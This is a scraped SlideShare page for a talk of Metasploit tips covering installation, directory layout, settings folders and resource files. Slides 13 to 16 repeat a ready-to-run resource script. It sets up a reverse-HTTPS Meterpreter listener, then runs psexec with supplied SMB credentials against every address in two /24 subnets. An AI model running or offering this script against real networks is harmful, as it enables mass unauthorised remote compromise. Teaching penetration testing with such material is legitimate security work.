Metasploit magic the dark coners of the framework

1,560 views
1,301 views

Published on

0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,560
On SlideShare
0
From Embeds
0
Number of Embeds
12
Actions
Shares
0
Downloads
29
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Metasploit magic the dark coners of the framework

  1. 1. Metasploit Magic A little sleight of hand
  2. 2. But first...
  3. 3. Installing Metasploit svn co https://metasploit.com/svn/trunk msf
  4. 4. not.. here
  5. 5. ESPECIALLY not here
  6. 6. it is a SYN
  7. 7. SRSLY!
  8. 8. here is ok ;-)
  9. 9. and remember... this isn’t the only place you can install it...
  10. 10. Directory Structure HACKING msfd msfrpcd documentation msfmachscan psexec.rc msfconsole msfrpc armitage msfgui plugins data msfpescan scripts msfcli tools README msfencode bins modules msfpayload external msfelfscan msfupdate lib msfopcode
  11. 11. ~/.msf3/ • history, logs, loot • msfconsole.rc • YOUR SETTINGS • modules • YOUR MODULES
  12. 12. resource files line by line script can understand ruby for meterpreter sessions now! ./msfconsole -r psexec.rc msf> resource psexec.rc
  13. 13. use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
  14. 14. use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
  15. 15. use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
  16. 16. use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
  17. 17. magic • user .*psexec
  18. 18. other fun... • script • color = false • screen
  19. 19. meterpreter>guid • twitter.com/mubix • mubix[hak5.org]

×